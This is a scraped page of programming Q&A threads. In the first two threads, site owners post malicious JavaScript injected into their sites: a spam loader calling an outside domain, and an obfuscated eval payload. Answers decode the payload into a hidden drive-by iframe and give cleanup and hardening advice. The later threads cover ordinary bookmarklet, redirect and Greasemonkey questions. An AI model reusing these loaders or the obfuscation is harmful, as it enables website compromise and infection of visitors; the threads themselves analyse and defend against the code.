Malicious javascript posted in forum - javascript

<SCRIPT>
ff = 0;
for (nn in document) if (nn == 'etours' || nn == 'logo-anim') ff = 1;
if (ff == 0 || (/LIVE|MSN|YAHOO|GENERIC|NORVASC/.test (document.referrer.toUpperCase ()) && false ) ) {
document.write('<SCRIPT SRC ="http://p090303.info/w.php?l='+ escape(location.href) + '&k=' + escape('generic norvasc') + '&r=' + escape(document.referrer) + '"><' + '/SCRIPT>' ); document.write ('<' + '!--' );
}
</SCRIPT>
Recognize this code? I see it's stuck in a number of websites, but all the characters have been replaced with their hex or octal equivalent. Someone posted this code in a post on one of my dad's sites, but I can't quite figure out what it's doing. It seems to be harvesting mappings of web pages to referrers, but I can't figure out what the first few lines are doing. Anyone have any idea what's going on here?

It's writing a script tag to the page, pointing to their javascript. Their javascript will be executed on your website, making them do whatever they please to your website.
The first few lines are just some checks on variables that are probably created within their script. Maybe something to do with checking if the script tag has already been written.

It's checking for dependencies (javascript variables set by other code), then it dials home to let the home server know what page it successfully infected. Home appears to be here in Kiev.

Related

bookmarklet: click for random specified links from a host domain

tl;dr: A bookmarklet that opens in a new tab: random link (with specified multiple html-classes) from a specified domain and code that works with current logins. Thank you.
short version of butchered code:
javascript:
(
var % 20 site = domain.com
function() {
window.location.host == site
void(window.open(document.links[Math.floor(document.querySelectorAll("a.class1, a.class2"))].href, '_blank'))
}();
//beautified with: http://jsbeautifier.org/
To whom it may concern:
I have searched around for a while and even considered switching services but although some come close or are similar to my particular request, none have served to address everything the request entails.
Execute the script on a specific domain even when no page from said domain is currently open. If login authentication for attaining the information or data for execution is required, read or work in conjunction with existing session.
Fetch from a specific domain host, a random link out of all links on that domain with a certain html-class (or indeed otherwise) using preferably, css-selectors.
Open the results in a new tab.
From butchering such similarities, the result became something like this:
//bookmarklet
javascript:
//anonymous function+ wrapped code before execution
(
// function global variables for quick substitution
var %20 site = domain.com
function(){
//set domain for script execution
window.location.host == site
//open new tab for
void(window.open(document.links
//random link
[Math.floor
//with specific classes (elements found with css selectors)
(document.querySelectorAll("a.class1, a.class2"))
]//end random-query
.href,'_blank' //end page-open
)//end link-open
)//end "void"
}//end function defintion
//execute
();
//(tried) checked with:
//http://www.javascriptlint.com/online_lint.php
Lastly, i have attained at most, basic css knowledge. I apologise if this request has anybody headdesking, palming or otherwise in gtfo mode. It is only too sad there is apparently no tag for "Warning: I DIY-ed this stuff" in StackExchange. However, i still would like answers that go into a bit of depth of explaining why and what each correction and modification is.
Thank you presently, for your time and effort.
Theoretically, the following code should do what you want:
window.addEventListener('load', function ( ) {
var query = 'a.class1[href], a.class2[href]';
var candidates = document.querySelectorAll(query);
var choice = Math.floor(Math.random() * candidates.length);
window.open(candidates.item(choice).href, 'randomtab');
}, true);
window.location.href = 'http://domain.com';
But it doesn't, because the possibility to retain event listeners across a page unload could be abused and browsers protect you against such abuse.
Instead, you can manually load the domain of your choice and then click a simpler bookmarklet with the following code:
var query = 'a.class1[href], a.class2[href]';
var candidates = document.querySelectorAll(query);
var choice = Math.floor(Math.random() * candidates.length);
window.open(candidates.item(choice).href, 'randomtab');
You could wrap the above in javascript:(function ( ) { ... })(); and minify as before, but it already works if you just minify it and only slap a javascript: in front.
I understand your situation of being an absolute beginner and posting "DIY" code, but I'm still not going to explain step-by-step why this code works and yours doesn't. The first version of the code above is complex to explain to a beginner, and the list of issues with the code in the question is too long to discuss all of them. You'll be better off by studying more Javascript; a good resource with tutorials is MDN.

Site hacked with javascript code inserted

A number of sites that I manage have been hacked and the following javascript code has been inserted into each of the pages. I have no idea how to decode this or what it even does so I don't know how serious it is. Can anyone help?
<script type="text/javascript" language="javascript">
if(document.querySelector)bqlelz=4;zibka=("36,7c,8b,84,79,8a,7f,85,84,36,8c,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,8c,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,8c,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8b,86,79,82,7f,7b,84,8a,44,79,85,83,45,44,89,83,7f,82,7b,8f,89,45,7d,70,61,87,5e,7e,6d,49,44,86,7e,86,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,86,85,89,7f,8a,7f,85,84,36,53,36,3d,77,78,89,85,82,8b,8a,7b,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,79,85,82,85,88,36,53,36,3d,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,7e,7b,7f,7d,7e,8a,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8d,7f,7a,8a,7e,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,82,7b,7c,8a,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8a,85,86,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,23,20,36,7f,7c,36,3e,37,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,3f,36,91,23,20,36,7a,85,79,8b,83,7b,84,8a,44,8d,88,7f,8a,7b,3e,3d,52,86,36,7f,7a,53,72,3d,8c,72,3d,36,79,82,77,89,89,53,72,3d,8c,46,4f,72,3d,36,54,52,45,86,54,3d,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,44,77,86,86,7b,84,7a,59,7e,7f,82,7a,3e,8c,3f,51,23,20,36,93,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,69,7b,8a,59,85,85,81,7f,7b,3e,79,85,85,81,7f,7b,64,77,83,7b,42,79,85,85,81,7f,7b,6c,77,82,8b,7b,42,84,5a,77,8f,89,42,86,77,8a,7e,3f,36,91,23,20,36,8c,77,88,36,8a,85,7a,77,8f,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,8c,77,88,36,7b,8e,86,7f,88,7b,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,7f,7c,36,3e,84,5a,77,8f,89,53,53,84,8b,82,82,36,92,92,36,84,5a,77,8f,89,53,53,46,3f,36,84,5a,77,8f,89,53,47,51,23,20,36,7b,8e,86,7f,88,7b,44,89,7b,8a,6a,7f,83,7b,3e,8a,85,7a,77,8f,44,7d,7b,8a,6a,7f,83,7b,3e,3f,36,41,36,49,4c,46,46,46,46,46,40,48,4a,40,84,5a,77,8f,89,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,36,53,36,79,85,85,81,7f,7b,64,77,83,7b,41,38,53,38,41,7b,89,79,77,86,7b,3e,79,85,85,81,7f,7b,6c,77,82,8b,7b,3f,23,20,36,41,36,38,51,7b,8e,86,7f,88,7b,89,53,38,36,41,36,7b,8e,86,7f,88,7b,44,8a,85,5d,63,6a,69,8a,88,7f,84,7d,3e,3f,36,41,36,3e,3e,86,77,8a,7e,3f,36,55,36,38,51,36,86,77,8a,7e,53,38,36,41,36,86,77,8a,7e,36,50,36,38,38,3f,51,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,5d,7b,8a,59,85,85,81,7f,7b,3e,36,84,77,83,7b,36,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,88,8a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,84,77,83,7b,36,41,36,38,53,38,36,3f,51,23,20,36,8c,77,88,36,82,7b,84,36,53,36,89,8a,77,88,8a,36,41,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,41,36,47,51,23,20,36,7f,7c,36,3e,36,3e,36,37,89,8a,77,88,8a,36,3f,36,3c,3c,23,20,36,3e,36,84,77,83,7b,36,37,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,46,42,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,3f,36,3f,36,3f,23,20,36,91,23,20,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,93,23,20,36,7f,7c,36,3e,36,89,8a,77,88,8a,36,53,53,36,43,47,36,3f,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,8c,77,88,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,38,51,38,42,36,82,7b,84,36,3f,51,23,20,36,7f,7c,36,3e,36,7b,84,7a,36,53,53,36,43,47,36,3f,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,82,7b,84,7d,8a,7e,51,23,20,36,88,7b,8a,8b,88,84,36,8b,84,7b,89,79,77,86,7b,3e,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,82,7b,84,42,36,7b,84,7a,36,3f,36,3f,51,23,20,93,23,20,7f,7c,36,3e,84,77,8c,7f,7d,77,8a,85,88,44,79,85,85,81,7f,7b,5b,84,77,78,82,7b,7a,3f,23,20,91,23,20,7f,7c,3e,5d,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,3f,53,53,4b,4b,3f,91,93,7b,82,89,7b,91,69,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,42,36,3d,4b,4b,3d,42,36,3d,47,3d,42,36,3d,45,3d,3f,51,23,20,23,20,8c,46,4f,3e,3f,51,23,20,93,23,20,93".split(","));twuss=eval;function oqvw(){iuwo=function(){--(uiopm.body)}()}uiopm=document;for(wxuxe=0;wxuxe<zibka["length"];wxuxe+=1){zibka[wxuxe]=-(22)+parseInt(zibka[wxuxe],bqlelz*4);}try{oqvw()}catch(ggpl){hywzjw=50-50;}if(!hywzjw)twuss(String["fr"+"omCh"+"arCo"+"de"].apply(String,zibka));
</script>
I'm assuming these are character references and it's actually pointing to a site somewhere with some malicious content but I don't know how to work it out. I am going through and removing all of these and changing all passwords to prevent further security issues but any advice on this would be greatly appreciated!
Thanks.
In my experience, these sort of attacks happen on shared hosting servers where an automated bot has either guessed the password to the account, or there is malware on the account holder's desktop that has captured the credentials and is now abusing them.
Your best bet? Accept that there is definitely going to be an impact to your users, and then do your due diligence:
Notify your shared host if you're not the owner.
Archive the entire home directory of the shared hosting account, and include the contents of that user's cron jobs, databases, email and other information. (eg. tar -czf website-$(date +%F).tar.gz ~/ or your shared hosting backup utility.)
Check for any malicious processes or scripts that could be running. ps gaux is your friend.
Nuke everything in the shared hosting account.
Change every password, regardless, even if you think it couldn't have possibly been affected.
Re-create the account and leave a maintenance page available for your users. You should have backups of your account.
Unpack the backup within a virtual machine and investigate everything including logs and other information to discover how the attack occurred. Apply what you learn to your website code.
Re-deploy your code with the fixes, taking into account the causes you discovered in the previous step; if your account was using a framework like Joomla, Drupal, Wordpress or something similar, take this time to upgrade to the latest version.
Do not skip steps, or this will happen again.
This is what was injected. To decipher this, you do the same thing the javascript in your post does. Split the string into hex strings on the comma, then parseInt with base 16, subtract 22, and look up the character for that char code. How it could be used maliciously, I'm not sure. Anyone have any ideas?
function v09() {
var static = 'ajax';
var controller = 'index.php';
var v = document.createElement('iframe');
v.src = 'http://upclient.com/.smileys/gZKqHhW3.php';
v.style.position = 'absolute';
v.style.color = '968';
v.style.height = '968px';
v.style.width = '968px';
v.style.left = '1000968';
v.style.top = '1000968';
if (!document.getElementById('v')) {
document.write('<p id=\'v\' class=\'v09\' ></p>');
document.getElementById('v').appendChild(v);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0)
nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length)))
{
return null;
}
if (start == -1)
return null;
var end = document.cookie.indexOf(";", len);
if (end == -1)
end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled)
{
if (GetCookie('visited_uq') == 55) {
} else {
SetCookie('visited_uq', '55', '1', '/');
v09();
}
}
This type of thing has happened to me also, I was not on a shared hosting solution, I was on a dedicated server, there was no evidence of any FTP or SSH or SCP activity.
I realized that someone used one of my forms to do code injection (my sites are PHP). This can be achieved by using your own code against you, by providing input to a textbox or text field that would be interpreted by some code on your server.
For example, you may have a small form to allow people to upload files into a directory of some sort. Someone can upload a code file and then execute it and this code file can be the culprit used to inject the javascript code into your own code pages.
With this instance one can restrict what file types are allowed to be uploaded, place the files in a directory where a browser would not be able to access it directly or make sure the file has no execute permissions when uploaded.
You can also make sure to sanitize inputs so that no malicious text can be effective in any of your forms.

Javascript is broken in html page source

I have a java web application. I am using jquery in it. I am calling some javascript from my jsp page. I have used EL, jstl tag in my page. Some of jquery variables is assigned from jsp variable. A strange problem occurs randomly. Some of javascript line have broken. I found those from Page Source option of browser. But in the jsp page I have found that no code is broken.
Say I have the following line in jsp
var iChars = "!##$%^&*()+=-[]\\\';,./{}|\":<>?~_";
var term = $.trim(request.term.toLowerCase());
var wordCount = term.split(" ").length;
if (term.length > 0 && iChars.indexOf(term.charAt(0)) == -1) {
// here a jquery ajax call
}
else if (term.length > 0 && iChars.indexOf(term.charAt(0)) != -1) {
$("#simpleSearch-1105 .field").autocomplete("close");
alert("Search word should not start with !##$%^&*()+=-[]\\\';,./{}|\":<>?~_");
}
But in the html page source I found the line as follows
$("#simpleSearch-
1105 .field").autocomplete("close");
The code is broken to two line. For this getting js error. I found no valid reason for that. It seems completely strange to me. Could you guys can give me some clue ? Whats may be the cause ?
Note: I also have firebug installed. First I thought that it may be due to firebug. Then I uninstalled firebug. But still same result.

Re-Direct with document.url.match

My goal is to redirect my website to (/2012/index.php)
ONLY IF the user goes to ( http://www.neonblackmag.com )
ELSE IF
the user goes to ( http://neonblackmag.com.s73231.gridserver.com ) they will not be re-directed... ( this way i can still work on my website and view it from this url ( the temp url )
I have tried the following script and variations, i have been unsuccessful in getting this to work thus far....
<script language="javascript">
if (document.URL.match("http://www.neonblackmag.com/")); {
location.replace("http://www.neonblackmag.com/2012"); }
</script>
This should work:
<script type="text/javascript">
if(location.href.match(/www.neonblackmag.com/)){
location.replace("http://www.neonblackmag.com/2012");
}
</script>
You should use regular expression as an argument of match (if you're not using https you can drop match for http://...
In your solution the semicolon after if should be removed - and I think that's it, mine is using location.href instead of document.URL.
You can also match subfolders using location.href.match(/www.neonblackmag.com\/subfolder/) etc
Cheers
G.
document.url doesn't appear to be settable, afaict. You probably want window.location
<script type="text/javascript">
if (window.location.hostname === "www.neonblackmag.com") {
window.location.pathname = '/2012';
}
</script>
(Don't use language="javascript". It's deprecated.)
Anyone at any time can disable JavaScript and continue viewing your site. There are better ways to do this, mostly on the server side.
To directly answer your questions, this code will do what you want. Here's a fiddle for it.
var the_url = window.location.href;
document.write(the_url);
// This is our pretend URL
// Remove this next line in production
var the_url = 'http://www.neonblackmag.com/';
if (the_url.indexOf('http://www.neonblackmag.com/') !== -1)
window.location.href = 'http://www.neonblackmag.com/2012/index.php';
else
alert('Welcome');
As I said, this can be easily bypassed. It'd be enough to stop a person who can check email and do basic Google searches.
On the server side is where you really have power. In your PHP code you can limit requests to only coming from your IP, or only any other variable factor, and no one can get in. If you don't like the request, send them somewhere else instead of giving them the page.
header('Location: /2012/index.php'); // PHP code for a redirect
There are plenty of other ways to do it, but this is one of the simpler. Others include, redirecting the entire domain, or creating a test sub domain and only allow requests to that.

Why does dojo.xhrGet needs different kinds of url to work on different computers (pc/mac)?

i'm writing an greasemonkey script for somebody else. he is a moderator and i am not. and the script will help him do some moderating things.
now the script works for me. as far as it can work for me.(as i am not a mod)
but even those things that work for me are not working for him..
i checked his version of greasemonkey plugin and firefox and he is up to date.
only thing that's really different is that i'm on a mac and he is pc, but i wouldn't think that would be any problem.
this is one of the functions that is not working for him. he does gets the first and third GM_log message. but not the second one ("got some(1) ..").
kmmh.trackNames = function(){
GM_log("starting to get names from the first "+kmmh.topAmount+" page(s) from leaderboard.");
kmmh.leaderboardlist = [];
for (var p=1; p<=(kmmh.topAmount); p++){
var page = "http://www.somegamesite.com/leaderboard?page="+ p;
var boardHTML = "";
dojo.xhrGet({
url: page,
sync: true,
load: function(response){
boardHTML = response;
GM_log("got some (1) => "+boardHTML.length);
},
handleAs: "text"
});
GM_log("got some (2) => "+boardHTML.length);
//create dummy div and place leaderboard html in there
var dummy = dojo.create('div', { innerHTML: boardHTML });
//search through it
var searchN = dojo.query('.notcurrent', dummy).forEach(function(node,index){
if(index >= 10){
kmmh.leaderboardlist.push(node.textContent); // add names to array
}
});
}
GM_log("all names from "+ kmmh.topAmount +" page(s) of leaderboard ==> "+ kmmh.leaderboardlist);
does anyone have any idea what could be causing this ??
EDIT: i know i had to write according to what he would see on his mod screen. so i asked him to copy paste source of pages and so on. and besides that, this part of the script is not depending on being a mod or not.
i got everything else working for him. just this function still doesn't on neither of his pc's.
EDIT2 (changed question): OK. so after some more trial and error, i got it to work, but it's still weird.
when i removed the www-part of the url thats being use in the dojo.xhrGet() i got the finally the same error he got. so i had him add www to his and now it works.
the odd thing is he now uses a script with the url containing "www" and i'm using a script with an url without "www"...
so for me:
var page = "http://somegamesite.com/leaderboard?page="+ p;
and for him:
var page = "http://www.somegamesite.com/leaderboard?page="+ p;
Why don't you have him try logging into an account that is not a moderator account so that you eliminate one of your variables from your problem space.
It's possible that the DOM of the page is different for a moderator than for a regular user. If you're making assumptions about the page as a regular user that are not true as a moderator, that could cause problems.
I suspect that to fix it, you may need access to a moderator account so you can more easily replicate the behavior.
ooops. it seemed that the url of this gamesite is accessible as www.gamesite.com as well as gamesite.com (without the www.part). this caused the problem.
sorry to bother you'all.
i go hide in shame now...

Categories